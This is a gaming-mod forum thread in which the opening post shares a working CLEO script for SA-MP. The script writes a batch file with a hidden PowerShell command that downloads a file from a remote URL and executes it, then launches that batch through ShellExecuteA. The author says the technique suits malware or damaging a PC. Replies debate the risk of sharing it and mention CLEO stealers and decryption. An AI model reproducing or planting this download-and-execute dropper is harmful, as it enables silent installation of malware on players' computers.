[Presentation] Command line functionality

The code below creates and executes a batch file with instructions to download an image and execute it immediately. The interesting part is that it also could be used for any other application, like malware for example. Or to do some damage to the PC directly from the command line

Tested with:
-Cleo 4.1
-Sampfuncs 5.3.1
-Samp 0.3.7

/*
The code seems more comlex than the actual working mechanism because of the "wooden" string handling. It seems that "0A9E: writefile" opcode doesn't work if a string pointer is used so the string is cut and step by step written to the file. Also it seems that using too long strings causes the code to ignore them so that's why there are multiple "@write_file" calls instead of 1 with a 1 simple long string.
*/

{$CLEO .cs}
0000: NOP

repeat
wait 50
until 0AFA: is_samp_structures_available

0A9A: 1@ = openfile "file.bat" mode "wt+"  // IF and SET

alloc 2@ 500
format 2@ "powershell.exe -nop -w hidden -c $down = New-Object System.Net.WebClient; $url = 'http:/" //part of the link
call @write_file 2 file 1@ string 2@
format 2@ "/motherboard-images.vice.com/content-images/article/20733/1428578997900669.jpg'; " //link
call @write_file 2 file 1@ string 2@
format 2@ "$file = 'pic.jpg'; $down.DownloadFile($url,$file); "  // 'pic.jpg' is the name the file will have when saved
call @write_file 2 file 1@ string 2@
format 2@ "$exec = New-Object -com shell.application; $exec.shellexecute($file); exit;"  //executes the file
call @write_file 2 file 1@ string 2@

0A9B: closefile 1@

         
//by springfield      
0AA2: 0@ = "shell32.dll"
if 0AA4: 0@ = "ShellExecuteA" 0@
then
   0AA7: 0@ push 6 pop 1 params 1 0 0 "file.bat" 0 0 error_code 1@  
   if 1@ <= 32
   then 
   printf "FAILURE: %d" 1000 1@
   end
end
//by springfield 


0A93: end_custom_thread


:write_file
0C17: 31@ = strlen 1@
alloc 24@ 150

while 31@ >= 16
    wait 0
    0C24: strncpy destination 24@ source 1@ size 16
    
    format 25@v "%s" 24@
    chatmsg "%s %d" -1 25@v 31@
    0A9E: writefile 0@ size 16 from 25@v
    
    1@ += 16
    0C17: 31@ = strlen 1@                
end

if 31@ > 0
then
    format 25@v "%s" 1@
    chatmsg "%s %d" -1 25@v 31@
    0A9E: writefile 0@ size 31@ from 25@v
end

ret 0

 

[Mila.cs ✅]

:not bad:

Prepare for Cleo malwares.

 

[PlasticBottle]

You are crazy for sharing this, as Mila said, prepare for cleo malwares...

 

[Opcode.eXe]

YAY! Lets make something public everyone keept private to protect the normies!
Bad idea m8

// next a stealer? gg arent we against this kind of stuff?

 

[Forever15]

-_- dengerous . .

 

[monday]

 

[Forever15]

but nice!

 

[monday]

guys I really believe it could have a positive impact, i'll try to justify it when i defeat the alcohol(max 4 days;p)pls don't delete, thanks

 

[0x_]

I made a mod already to protect users against this and more, it needs some refining then I'll release it open source probably also.

 

[Forever15]

@0x688 ohh is it asi ? the mod u created? to protect the user

 

[mistery]

yes but who will try a cleo which has "open .bat" and "http://.." inside lol...
anyways, time to find a good decrypter :} if u know what i mean

 

[springfield]

I don't see the point in thinking this is dangerous.

We know 'stealers' and keyloggers exists in CLEO since some years ago(there are some sources posted on this forum actually, HERE), that would steal passwords from sa-mp dialogs, pins from textdraws etc.

I doubt that anybody(mostly russians) that tangled with such things, considering they were using win apis like InternetConnect, HttpSendRequest etc.,  didn't think of using the same exact thing as here, to download/run/install some kind of malware.

CLEOs that are posted in the RELEASE section, are usually decrypted(if needed) and manually checked before being approved.

 

[MrChristmas]

+ in this days most of the users can decrypt most of the Cleos by themselves and see if they are safe or not to use.

 

[PlasticBottle]

Yeah, we can decrypt shit and everything, but it's not the case for "X_h4x0r1337_X" who comes here for the first time to download random shit (even though cleos in release are safe)

 

[monday]

@PlasticBottle @Opcode.eXe @Forever15
sharing this has some nasty potential but there's also the positive side of it. Tools like that are some soft of power. They are equivalent with real life tools like a gun or a big muscle mass. While both can be used for immoral reasons their general positive contribution shouldn't be neglected. I'd compare sharing this code with sharing a protein powder or sharing a tutorial on how to make home made gun for self-defence/counter-attack.

Personally I never considered using any kind of power for unprovoked abuse or malicious purposes and I think that there are a lot of people like that. Who squander as much power as they can through all their life hoping that someday in a dangerous situation it can be used for protection, protection even by means of some sort of counter attack, which would require power like a gun, physical strength or offensive software

 

[PlasticBottle]

I gues you are right, and also nowadays, there isn't as much malwares as like 3 years ago. Even though we have powerful antiviruses etc, sharing this can be bad. It's like a double-edged sword, we will see how it turns out...